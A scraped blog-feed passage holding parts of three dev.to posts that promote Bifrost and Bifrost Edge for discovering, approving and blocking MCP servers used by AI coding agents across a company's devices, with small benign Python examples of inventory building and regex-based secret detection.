  Automated MCP Server Discovery and Approval
&lt;/h3&gt;

&lt;p&gt;One of the most significant challenges with ungoverned MCP servers is a lack of visibility. Edge addresses this by actively inventorying the MCP servers configured within each AI application across the entire fleet of devices. This process builds a live, deduplicated catalog of every MCP server in use.&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;  &lt;strong&gt;Fleet-wide Inventory:&lt;/strong&gt; Administrators gain a clear dashboard view of all discovered MCP servers, noting which ones are in use, on how many devices, and their current approval status. This provides the data necessary to make informed governance decisions.&lt;/li&gt;
&lt;li&gt;  &lt;strong&gt;Centralized Approval Workflow:&lt;/strong&gt; When Edge detects a new MCP server, it can automatically request approval in the Bifrost admin console. Administrators can then allow or deny the server, or leave it pending, and the decision is enforced across all relevant devices. A denied MCP server cannot be used, even if an application was previously configured to connect to it.&lt;/li&gt;
&lt;/ul&gt;
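&lt;p&gt;The deduplicated catalog described above amounts to grouping per-device reports by server. The following sketch assumes a hypothetical report shape (a &lt;code&gt;hostname&lt;/code&gt; plus a list of &lt;code&gt;mcp_servers&lt;/code&gt;) and a hypothetical &lt;code&gt;build_catalog&lt;/code&gt; function; it shows the idea rather than how Edge actually stores its inventory.&lt;/p&gt;

```python
from collections import defaultdict


def build_catalog(device_reports, decisions):
    """Collapse per-device MCP server reports into one entry per server."""
    devices_by_server = defaultdict(set)
    for report in device_reports:
        for server in report["mcp_servers"]:
            devices_by_server[server].add(report["hostname"])
    return [
        {
            "server": server,
            "device_count": len(hosts),
            # Servers without a recorded decision default to Pending.
            "status": decisions.get(server, "Pending"),
        }
        for server, hosts in sorted(devices_by_server.items())
    ]


reports = [
    {"hostname": "laptop-01", "mcp_servers": ["github", "filesystem"]},
    {"hostname": "laptop-02", "mcp_servers": ["github"]},
]
catalog = build_catalog(reports, {"github": "Approved"})
for entry in catalog:
    print(entry)
```

&lt;p&gt;Using a set of hostnames per server means a device that reports the same server from several applications is still counted once.&lt;/p&gt;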

&lt;h3&gt;
  
  
  Enforcing Policies on the Device
&lt;/h3&gt;

&lt;p&gt;Bifrost Edge ensures that governance is not advisory but strictly enforced. When an MCP server is denied through the Bifrost control plane, Edge prevents any traffic from reaching that server from the endpoint, regardless of the application's local configuration. This active enforcement is critical for maintaining compliance and security across the organization.&lt;/p&gt;

&lt;h3&gt;
  
  
  Guardrails and Security Everywhere
&lt;/h3&gt;

&lt;p&gt;The guardrails configured in the Bifrost AI gateway automatically extend to all AI traffic routed through Edge. This means that sensitive information, PII, or secrets are detected and blocked before they leave an employee's machine, or before an unapproved MCP server can process them. This consistent application of security policies significantly reduces the attack surface and helps achieve compliance with various data protection standards.&lt;/p&gt;

&lt;h3&gt;
  
  
  Seamless Deployment with MDM
&lt;/h3&gt;

&lt;p&gt;For large organizations, rolling out endpoint agents can be complex. Bifrost Edge is designed for fleet-wide deployment via existing Mobile Device Management (MDM) platforms, including Jamf, Microsoft Intune, Kandji, Omnissa Workspace ONE, and JumpCloud. This allows for silent installation and managed configuration, ensuring broad coverage without requiring manual user setup.&lt;/p&gt;

&lt;h2&gt;
  
  
  Benefits of Centralized MCP Governance
&lt;/h2&gt;

&lt;p&gt;By combining the power of an AI gateway like &lt;a href="https://www.getmaxim.ai/bifrost" rel="noopener noreferrer"&gt;Bifrost&lt;/a&gt; with the endpoint reach of &lt;a href="https://www.getmaxim.ai/bifrost/edge" rel="noopener noreferrer"&gt;Bifrost Edge&lt;/a&gt;, organizations can achieve comprehensive control over their AI ecosystem:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;  &lt;strong&gt;Eliminate Shadow AI:&lt;/strong&gt; Gain full visibility and control over all AI tools and MCP server connections, regardless of where they are used.&lt;/li&gt;
&lt;li&gt;  &lt;strong&gt;Enhanced Security:&lt;/strong&gt; Apply consistent security policies and guardrails to all AI traffic, protecting sensitive data from exfiltration and misuse.&lt;/li&gt;
&lt;li&gt;  &lt;strong&gt;Assured Compliance:&lt;/strong&gt; Maintain immutable audit trails and enforce data governance policies across the entire AI surface, simplifying compliance with regulations.&lt;/li&gt;
&lt;li&gt;  &lt;strong&gt;Streamlined Operations:&lt;/strong&gt; Manage AI policies and approvals centrally, with automatic enforcement at the endpoint, reducing manual overhead and risk.&lt;/li&gt;
&lt;li&gt;  &lt;strong&gt;Empowered Developers:&lt;/strong&gt; Developers can continue to innovate with AI tools, confident that their work aligns with organizational security and governance standards.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;For enterprise teams working through AI governance and aiming for secure, compliant AI operations, combining an AI gateway with endpoint enforcement offers a practical path to regaining control.&lt;/p&gt;

&lt;h2&gt;
  
  
  Sources
&lt;/h2&gt;

&lt;ol&gt;
&lt;li&gt; &lt;a href="https://www.enterprisemanagement.com/resources/blogs/shadow-ai-growing-concern" rel="noopener noreferrer"&gt;Enterprise Management Associates: Shadow AI: A Growing Concern&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt; &lt;a href="https://www.complianceweek.com/risk-management/navigating-the-ai-governance-tightrope/43599.article" rel="noopener noreferrer"&gt;Compliance Week: Navigating the AI governance tightrope&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt; &lt;a href="https://www.gartner.com/en/information-technology/glossary/shadow-it" rel="noopener noreferrer"&gt;Gartner: What Is Shadow IT?&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt; &lt;a href="https://docs.getbifrost.ai/features/governance/virtual-keys" rel="noopener noreferrer"&gt;Bifrost Docs: Virtual Keys&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt; &lt;a href="https://docs.getbifrost.ai/enterprise/guardrails" rel="noopener noreferrer"&gt;Bifrost Docs: Guardrails&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt; &lt;a href="https://docs.getbifrost.ai/enterprise/audit-logs" rel="noopener noreferrer"&gt;Bifrost Docs: Audit Logs&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt; &lt;a href="https://docs.getbifrost.ai/features/governance/mcp-tools" rel="noopener noreferrer"&gt;Bifrost Docs: MCP Tool Filtering&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt; &lt;a href="https://www.getmaxim.ai/bifrost/edge" rel="noopener noreferrer"&gt;Bifrost Edge Product Page&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt; &lt;a href="https://docs.getbifrost.ai/edge/mcp-governance" rel="noopener noreferrer"&gt;Bifrost Docs: Govern MCP servers&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href="https://docs.getbifrost.ai/edge/security" rel="noopener noreferrer"&gt;Bifrost Docs: Edge Security &amp;amp; Guardrails&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://docs.getbifrost.ai/edge/deployment-mdm" rel="noopener noreferrer"&gt;Bifrost Docs: Deploy with MDM&lt;/a&gt;&lt;/li&gt;
&lt;/ol&gt;

</description>
      <category>ai</category>
      <category>aigateway</category>
      <category>mcp</category>
      <category>governance</category>
    </item>
    <item>
      <title>Governing MCP Server Usage in Coding Agents Fleet-Wide</title>
      <dc:creator>Marcus Chen</dc:creator>
      <pubDate>Wed, 24 Jun 2026 18:29:18 +0000</pubDate>
      <link>https://dev.to/marcuswwchen/governing-mcp-server-usage-in-coding-agents-fleet-wide-5c6g</link>
      <guid>https://dev.to/marcuswwchen/governing-mcp-server-usage-in-coding-agents-fleet-wide-5c6g</guid>
      <description>&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2F6qsqmtd6odbws938fjtd.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2F6qsqmtd6odbws938fjtd.png" alt="Governing MCP Server Usage in Coding Agents Fleet-Wide" width="800" height="457"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;em&gt;This article explores the risks of ungoverned Model Context Protocol (MCP) server usage in coding agents and how &lt;a href="https://www.getmaxim.ai/bifrost" rel="noopener noreferrer"&gt;Bifrost&lt;/a&gt;, with its endpoint AI governance capabilities, enables fleet-wide visibility and control.&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;The rapid adoption of AI coding assistants by development teams has brought unprecedented productivity gains. However, this shift also introduces new governance challenges, particularly concerning the Model Context Protocol (MCP) servers these agents utilize. Ensuring that every instance of an AI coding assistant and its MCP server connections is visible and governed across an entire fleet requires a robust strategy. &lt;a href="https://www.getmaxim.ai/bifrost" rel="noopener noreferrer"&gt;Bifrost&lt;/a&gt;, an &lt;a href="https://github.com/maximhq/bifrost" rel="noopener noreferrer"&gt;open-source AI gateway&lt;/a&gt; from Maxim AI, provides the foundational infrastructure to manage and secure AI traffic, extending its capabilities to endpoint governance for comprehensive control over agentic workflows.&lt;/p&gt;

&lt;h2&gt;
  
  
  The Rise of Agentic Coding and MCP Servers
&lt;/h2&gt;

&lt;p&gt;The Model Context Protocol (MCP) is an open standard for connecting AI applications, such as assistants built on large language models (LLMs), with external systems like tools, data sources, and workflows. It acts as a universal adapter, allowing AI assistants to make structured API calls and interact with the outside world beyond their training data. This standardization helps solve the "N×M integration problem," where each AI application would otherwise need custom integrations for every external service.&lt;/p&gt;

&lt;p&gt;Coding agents, which use LLMs to perform complex development tasks, increasingly rely on MCP servers to execute actions like reading files, running tests, and interacting with APIs. Popular coding agents that support MCP include Claude Code, Codex CLI, Gemini CLI, Cursor, OpenCode, Qwen Code, Roo Code, and Zed Editor. These tools let developers automate repetitive tasks and accelerate development cycles.&lt;/p&gt;

&lt;h2&gt;
  
  
  The Hidden Risks of Ungoverned Tool Usage (Shadow AI)
&lt;/h2&gt;

&lt;p&gt;While powerful, the proliferation of AI coding assistants and their underlying MCP server connections introduces significant security and compliance risks for enterprises. Many organizations find that their developers are using these tools without formal approval or oversight from IT and security teams, a phenomenon widely known as "shadow AI".&lt;/p&gt;

&lt;p&gt;The consequences of ungoverned MCP server usage can be severe:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;  &lt;strong&gt;Sensitive Data Exfiltration:&lt;/strong&gt; MCP sessions often handle highly sensitive data, including API keys, database credentials, and personally identifiable information (PII). Without proper controls, this data can be exfiltrated through compromised or malicious tools. Traditional data loss prevention (DLP) tools are frequently unable to reliably parse the conversational, JSON-based payloads in MCP traffic, creating blind spots.&lt;/li&gt;
&lt;li&gt;  &lt;strong&gt;Unauthorized Agent Actions:&lt;/strong&gt; A compromised MCP server can lead to an agent performing unintended actions, such as modifying records, initiating transactions, or accessing unauthorized systems. Prompt injection attacks, a novel threat unique to LLMs, can manipulate agents into overriding security safeguards or revealing sensitive information through the tools they access.&lt;/li&gt;
&lt;li&gt;  &lt;strong&gt;Overprivileged Access and Privilege Escalation:&lt;/strong&gt; Many MCP-enabled tools require broad permissions, potentially violating the principle of least privilege. In multi-agent environments, a single compromised agent could escalate privileges laterally across other agents, turning a vulnerability into an organization-wide exposure.&lt;/li&gt;
&lt;li&gt;  &lt;strong&gt;Supply Chain Exposure:&lt;/strong&gt; MCP servers rely on software components, making them vulnerable to supply chain attacks. A compromised component could be used to exfiltrate data or manipulate agent instructions.&lt;/li&gt;
&lt;li&gt;  &lt;strong&gt;Missing Audit Trails:&lt;/strong&gt; Without centralized governance, there is no comprehensive record of which MCP servers were used, what actions were taken, or what data was accessed, making compliance and incident response difficult.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Fevj5ng1dchp5jes1zv9a.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Fevj5ng1dchp5jes1zv9a.png" alt="A dark, abstract network of interconnected nodes and obscured data packets, symbolizing shadow AI activity and hidden ri" width="800" height="457"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;The rise of shadow AI in development teams means that many agent-to-system integrations operate without security review, creating uninventoried blind spots where these risks can materialize undetected.&lt;/p&gt;

&lt;h2&gt;
  
  
  Bridging the Gap with Endpoint AI Governance
&lt;/h2&gt;

&lt;p&gt;To effectively mitigate these risks, organizations must implement robust AI governance that extends beyond the network perimeter to the endpoint where AI tools are actually used. Endpoint AI governance ensures that controls are applied directly on the device, covering desktop applications, browser-based AI, and coding agents.&lt;/p&gt;

&lt;p&gt;A comprehensive approach to governing AI on the endpoint integrates with an AI gateway as the central control plane. The &lt;a href="https://www.getmaxim.ai/bifrost" rel="noopener noreferrer"&gt;Bifrost&lt;/a&gt; AI gateway serves as the policy engine, where &lt;a href="https://www.getmaxim.ai/bifrost/resources/governance" rel="noopener noreferrer"&gt;governance&lt;/a&gt; and security controls (virtual keys, budgets, rate limits, routing, guardrails, and audit logs) are configured centrally. &lt;strong&gt;&lt;a href="https://www.getmaxim.ai/bifrost/edge" rel="noopener noreferrer"&gt;Bifrost Edge&lt;/a&gt;&lt;/strong&gt; then extends that same governance to AI traffic on employee machines, with &lt;a href="https://docs.getbifrost.ai/edge/security" rel="noopener noreferrer"&gt;endpoint enforcement&lt;/a&gt; on each device. Pairing the gateway with Edge is what makes AI security policy consistent and enforceable across the fleet.&lt;/p&gt;

&lt;h2&gt;
  
  
  Fleet-Wide MCP Server Discovery and Control with Bifrost Edge
&lt;/h2&gt;

&lt;p&gt;Bifrost Edge is an endpoint agent that runs on every computer in an organization, transparently routing all AI traffic through the company's Bifrost gateway. This enables comprehensive visibility and control over MCP server usage.&lt;/p&gt;

&lt;p&gt;A core Bifrost Edge capability is to &lt;strong&gt;inventory and govern MCP servers&lt;/strong&gt; [&lt;a href="https://docs.getbifrost.ai/edge/mcp-governance" rel="noopener noreferrer"&gt;https://docs.getbifrost.ai/edge/mcp-governance&lt;/a&gt;]. It automatically discovers the MCP servers configured within each AI application across the entire fleet, creating a live, centralized inventory for administrators. That inventory answers the question: "What MCP servers are running on our fleet?"&lt;/p&gt;

&lt;p&gt;Administrators can then make &lt;strong&gt;per-server allow/deny decisions&lt;/strong&gt; through a centralized approvals dashboard [&lt;a href="https://docs.getbifrost.ai/edge/admin-approvals" rel="noopener noreferrer"&gt;https://docs.getbifrost.ai/edge/admin-approvals&lt;/a&gt;]. A denied MCP server is actively blocked on the device, preventing any data from leaving the machine via that server, even if the application had it configured previously. This enforcement applies to a wide range of coding agents, including Claude Code, Claude Desktop, Gemini CLI, OpenCode, Codex, and Cursor [&lt;a href="https://docs.getbifrost.ai/edge/supported-applications" rel="noopener noreferrer"&gt;https://docs.getbifrost.ai/edge/supported-applications&lt;/a&gt;]. When Edge detects a new MCP server or application, it automatically requests approval in the admin console, allowing for proactive governance [&lt;a href="https://docs.getbifrost.ai/edge/app-governance" rel="noopener noreferrer"&gt;https://docs.getbifrost.ai/edge/app-governance&lt;/a&gt;].&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Fjz1rwn60zmuqwgn0xcpy.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Fjz1rwn60zmuqwgn0xcpy.png" alt="A unified, clean interface or dashboard, visually representing Bifrost Edge's fleet-wide discovery and control of MCP se" width="800" height="457"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  Centralized Policy, Decentralized Enforcement
&lt;/h2&gt;

&lt;p&gt;With Bifrost Edge, the existing governance framework defined within the Bifrost AI gateway seamlessly extends to the endpoint. This means that virtual keys, budget allocations, rate limits, and guardrails configured in Bifrost automatically apply to prompts and responses from desktop apps, browser AI, and coding agents [&lt;a href="https://docs.getbifrost.ai/edge/security" rel="noopener noreferrer"&gt;https://docs.getbifrost.ai/edge/security&lt;/a&gt;].&lt;/p&gt;

&lt;p&gt;Guardrails, which are configured using reusable profiles and rules at the gateway level [&lt;a href="https://docs.getbifrost.ai/enterprise/guardrails" rel="noopener noreferrer"&gt;https://docs.getbifrost.ai/enterprise/guardrails&lt;/a&gt;], detect and prevent sensitive content—such as secrets or PII—from leaving the machine. This includes native &lt;strong&gt;Secrets Detection&lt;/strong&gt; (Gitleaks-backed) and &lt;strong&gt;Custom Regex&lt;/strong&gt; capabilities, as well as integrations with third-party guardrail providers like AWS Bedrock Guardrails, Azure Content Safety, CrowdStrike AIDR, GraySwan Cygnal, and Patronus AI [&lt;a href="https://docs.getbifrost.ai/enterprise/guardrails" rel="noopener noreferrer"&gt;https://docs.getbifrost.ai/enterprise/guardrails&lt;/a&gt;].&lt;/p&gt;
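&lt;p&gt;To make the custom-regex idea concrete, here is a minimal Python sketch of a pattern-based check on outgoing text. The rule names, the two patterns, and the &lt;code&gt;check_prompt&lt;/code&gt; helper are assumptions made for illustration; this is not Bifrost's rule format, and Gitleaks ships a far larger rule set.&lt;/p&gt;

```python
import re

# Hypothetical rules for illustration only; not Bifrost's rule format.
RULES = {
    "aws_access_key_id": re.compile(r"\bAKIA[0-9A-Z]{16}\b"),
    "us_ssn": re.compile(r"\b\d{3}-\d{2}-\d{4}\b"),
}


def scan(text):
    """Return the sorted names of every rule that matches the text."""
    return sorted(name for name, pattern in RULES.items() if pattern.search(text))


def check_prompt(text):
    """Return a block/allow decision plus the names of the rules that fired."""
    hits = scan(text)
    return {"action": "block" if hits else "allow", "matched_rules": hits}


# The key below is the placeholder value from AWS documentation, not a real credential.
print(check_prompt("deploy with key AKIAIOSFODNN7EXAMPLE"))
print(check_prompt("summarize the release notes"))
```

&lt;p&gt;A production guardrail would also have to deal with redaction and false positives, which this sketch ignores.&lt;/p&gt;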

&lt;p&gt;Every AI request, whether from a centrally configured application or an endpoint coding agent, inherits the organization's comprehensive audit logging [&lt;a href="https://docs.getbifrost.ai/enterprise/audit-logs" rel="noopener noreferrer"&gt;https://docs.getbifrost.ai/enterprise/audit-logs&lt;/a&gt;], ensuring an immutable trail for compliance standards like SOC 2, GDPR, HIPAA, and ISO 27001.&lt;/p&gt;

&lt;h2&gt;
  
  
  Seamless Deployment and Continuous Compliance via MDM
&lt;/h2&gt;

&lt;p&gt;Rolling out endpoint AI governance across an enterprise fleet can be complex, but Bifrost Edge simplifies this through native integration with existing mobile device management (MDM) platforms. Organizations can push the Edge agent to every machine using managed configurations, eliminating the need for individual users to download or manually configure anything [&lt;a href="https://docs.getbifrost.ai/edge/deployment-mdm" rel="noopener noreferrer"&gt;https://docs.getbifrost.ai/edge/deployment-mdm&lt;/a&gt;].&lt;/p&gt;

&lt;p&gt;Bifrost Edge supports major MDM platforms, including Jamf, Microsoft Intune, Kandji, Omnissa Workspace ONE, and JumpCloud, across macOS, Windows, and Linux devices. This streamlines deployment, ensuring that machines are pre-configured to point to the organization's Bifrost instance. The setup process involves a single browser sign-in via the organization's single sign-on (SSO), linking the device to the user and syncing assigned policies without sensitive information residing on the device itself [&lt;a href="https://docs.getbifrost.ai/edge/how-it-works" rel="noopener noreferrer"&gt;https://docs.getbifrost.ai/edge/how-it-works&lt;/a&gt;].&lt;/p&gt;

&lt;p&gt;By actively governing AI at the endpoint, Bifrost Edge helps organizations:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;  &lt;strong&gt;End shadow AI:&lt;/strong&gt; Bring all user-initiated AI tool usage under governance.&lt;/li&gt;
&lt;li&gt;  &lt;strong&gt;Ensure zero per-app setup:&lt;/strong&gt; Transparently route traffic without requiring users to reconfigure individual applications.&lt;/li&gt;
&lt;li&gt;  &lt;strong&gt;Achieve compliance everywhere:&lt;/strong&gt; Extend existing security and governance policies to every laptop, aligning AI operations with regulatory requirements.&lt;/li&gt;
&lt;/ul&gt;

&lt;h2&gt;
  
  
  Securing the Future of Agentic Workflows
&lt;/h2&gt;

&lt;p&gt;The shift towards agentic coding workflows, where AI assistants interact autonomously with external tools, necessitates a proactive and comprehensive approach to governance. Relying solely on network-level controls is insufficient for the dynamic and distributed nature of modern AI tool usage.&lt;/p&gt;

&lt;p&gt;By combining the robust policy engine of the Bifrost AI gateway with the endpoint enforcement capabilities of Bifrost Edge, organizations can gain the visibility and control needed to securely embrace AI coding assistants. This integrated approach ensures that innovation in development proceeds hand-in-hand with enterprise security, compliance, and responsible AI practices. Teams evaluating AI gateways and endpoint governance solutions can &lt;a href="https://getmaxim.ai/bifrost/book-a-demo" rel="noopener noreferrer"&gt;request a Bifrost demo&lt;/a&gt; to explore these capabilities or review the &lt;a href="https://github.com/maximhq/bifrost" rel="noopener noreferrer"&gt;open-source repository&lt;/a&gt;.&lt;/p&gt;


</description>
      <category>aigovernance</category>
      <category>endpointsecurity</category>
      <category>mcp</category>
      <category>codingagents</category>
    </item>
    <item>
      <title>How Enterprises Monitor and Control Model Context Protocol Servers</title>
      <dc:creator>Marcus Chen</dc:creator>
      <pubDate>Wed, 24 Jun 2026 18:29:07 +0000</pubDate>
      <link>https://dev.to/marcuswwchen/how-enterprises-monitor-and-control-model-context-protocol-servers-4p1c</link>
      <guid>https://dev.to/marcuswwchen/how-enterprises-monitor-and-control-model-context-protocol-servers-4p1c</guid>
      <description>&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Fi7mbv333ouf6nkws1e4s.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Fi7mbv333ouf6nkws1e4s.png" alt="How Enterprises Monitor and Control Model Context Protocol Servers" width="800" height="457"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;em&gt;Enterprise AI deployments face significant challenges governing Model Context Protocol (MCP) servers used by AI agents. This article examines how organizations can gain visibility and implement robust controls for MCP usage across their fleet.&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;AI agents are rapidly transforming enterprise workflows, automating tasks and interacting with a multitude of tools. A key enabler of this functionality is the Model Context Protocol (MCP), which allows language models to discover, invoke, and interact with external services. While MCP unlocks powerful capabilities, it also introduces significant governance and security challenges for organizations. Without proper controls, IT and security teams cannot see which external tools employees' AI agents are using or what data flows through them. &lt;a href="https://www.getmaxim.ai/bifrost" rel="noopener noreferrer"&gt;Bifrost&lt;/a&gt;, an &lt;a href="https://github.com/maximhq/bifrost" rel="noopener noreferrer"&gt;open-source AI gateway&lt;/a&gt; from Maxim AI, provides a way to gain visibility into MCP server usage and enforce policies over it within an enterprise.&lt;/p&gt;

&lt;h2&gt;
  
  
  The Rise of Model Context Protocol (MCP) and Agentic AI
&lt;/h2&gt;

&lt;p&gt;The Model Context Protocol (MCP) defines a standard for how large language models (LLMs) and AI agents can interact with external tools and services. Instead of merely generating text, an AI agent leveraging MCP can read files, call APIs, and execute actions by connecting to specialized MCP servers. This capability is foundational for agents to perform complex, multi-step tasks that require real-world interaction, such as summarizing documents, managing calendars, or integrating with internal systems.&lt;/p&gt;

&lt;p&gt;As agentic AI becomes more prevalent, so does the reliance on MCP servers. These servers can be internal (connecting to company APIs) or external (integrating with third-party services). The power of MCP lies in its extensibility, allowing agents to become more versatile and effective. However, this extensibility also presents a governance paradox for enterprises: how can organizations permit the innovative use of agents while maintaining control over data, security, and compliance?&lt;/p&gt;

&lt;h2&gt;
  
  
  The Shadow AI Problem: Ungoverned MCP Servers
&lt;/h2&gt;

&lt;p&gt;The primary challenge for enterprises is the proliferation of "shadow AI": AI tool usage by employees that occurs outside the visibility and control of IT and security teams. When employees install popular AI desktop chat applications (such as Claude Desktop or Cursor), use coding agents in their terminals (like Claude Code or Gemini CLI), or interact with AI in their browsers, they may configure connections to various MCP servers without explicit oversight. These tools often allow users to specify arbitrary MCP server URLs.&lt;/p&gt;

&lt;p&gt;This ungoverned usage creates significant risks:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;  &lt;strong&gt;Data Exfiltration:&lt;/strong&gt; Sensitive company data could inadvertently be sent to unsanctioned external MCP servers.&lt;/li&gt;
&lt;li&gt;  &lt;strong&gt;Security Vulnerabilities:&lt;/strong&gt; Malicious or compromised MCP servers could introduce security risks to the corporate network or data.&lt;/li&gt;
&lt;li&gt;  &lt;strong&gt;Compliance Gaps:&lt;/strong&gt; Without an audit trail or policy enforcement, organizations cannot demonstrate compliance with regulations like SOC 2, GDPR, HIPAA, or ISO 27001 regarding AI usage.&lt;/li&gt;
&lt;li&gt;  &lt;strong&gt;Cost Overruns:&lt;/strong&gt; Uncontrolled agent activity can lead to unexpected costs from third-party services.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;A traditional AI gateway can only govern traffic that is explicitly routed through it. MCP servers configured directly on an employee's machine bypass this central control, creating a critical blind spot that most enterprises are unprepared to address.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Fid2ux4ack1n8e9kapf1l.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Fid2ux4ack1n8e9kapf1l.png" alt="A chaotic scene of numerous laptops and desktops with various AI chat interfaces open, depicting a 'shadow AI' problem w" width="800" height="457"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  Gaining Visibility: Inventory and Discovery of MCP Servers
&lt;/h2&gt;

&lt;p&gt;The first step in controlling MCP server usage is to understand what exists. Manually inventorying every MCP server configured across a fleet of employee machines is an impractical task. Enterprises need automated mechanisms to discover and catalog these connections.&lt;/p&gt;

&lt;p&gt;Bifrost Edge, the endpoint AI governance component of the Bifrost AI gateway, addresses this by running an agent natively on macOS, Windows, and Linux devices. This agent automatically identifies AI applications and the MCP servers configured within them. Edge builds a live, fleet-wide inventory of all MCP server connections. This capability allows security and IT teams to answer critical questions such as: "Which MCP servers are currently active across our endpoints?" or "Are employees connecting to any unsanctioned external tools via AI agents?"&lt;/p&gt;

&lt;p&gt;The collected data is then centralized in the Bifrost admin console, providing a consolidated view of all discovered applications and MCP servers. Edge's &lt;a href="https://docs.getbifrost.ai/edge/mcp-governance" rel="noopener noreferrer"&gt;MCP governance features&lt;/a&gt; provide this discovery for the major AI apps that support MCP, so connections made through those apps do not go unnoticed and administrators have the visibility they need to begin formulating and enforcing policies.&lt;/p&gt;
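&lt;p&gt;Conceptually, discovery amounts to reading each application's MCP configuration and merging the results into one catalog. The Python sketch below assumes a JSON layout with a top-level &lt;code&gt;mcpServers&lt;/code&gt; object, which several MCP clients use; the app names, server entries, and helper functions are hypothetical, and this is not a description of how Bifrost Edge is implemented.&lt;/p&gt;

```python
import json

# Hypothetical per-app config contents, inlined so the sketch runs anywhere.
# A real agent would read these from each application's config file.
APP_CONFIGS = {
    "desktop-chat-app": '{"mcpServers": {"files": {"command": "npx", "args": ["-y", "example-files-server"]}}}',
    "code-editor": '{"mcpServers": {"tickets": {"url": "https://mcp.example.com/sse"}, "files": {"command": "npx", "args": ["-y", "example-files-server"]}}}',
}


def server_identity(entry):
    """Build a comparable identity: the URL for remote servers, the command line for local ones."""
    if "url" in entry:
        return entry["url"]
    return " ".join([entry.get("command", "")] + entry.get("args", []))


def build_inventory(app_configs):
    """Map each distinct server identity to the sorted list of apps that configure it."""
    inventory = {}
    for app, raw in app_configs.items():
        servers = json.loads(raw).get("mcpServers", {})
        for entry in servers.values():
            inventory.setdefault(server_identity(entry), set()).add(app)
    return {identity: sorted(apps) for identity, apps in sorted(inventory.items())}


for identity, apps in build_inventory(APP_CONFIGS).items():
    print(identity, apps)
```

&lt;p&gt;Keying the catalog on the server's URL or command line, rather than on the nickname a user gave it, lets the same server configured in two apps collapse into one entry.&lt;/p&gt;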

&lt;h2&gt;
  
  
  Implementing Control: Centralized Governance for MCP Usage
&lt;/h2&gt;

&lt;p&gt;Once visibility is established, the next step is to implement robust controls. Bifrost, acting as the central AI gateway and policy engine, combined with Bifrost Edge enforcing those policies at the endpoint, provides a comprehensive governance framework.&lt;/p&gt;

&lt;p&gt;The Bifrost AI gateway is where virtual keys, budgets, rate limits, routing, guardrails, and audit logs are configured. &lt;a href="https://www.getmaxim.ai/bifrost/edge" rel="noopener noreferrer"&gt;Bifrost Edge&lt;/a&gt; then extends this governance to every machine. This means the same policies that apply to AI traffic routing through the gateway also apply to AI traffic originating from endpoint applications, including their MCP server interactions.&lt;/p&gt;

&lt;p&gt;For MCP server control, administrators can leverage the Bifrost admin console to:&lt;/p&gt;

&lt;ul&gt;
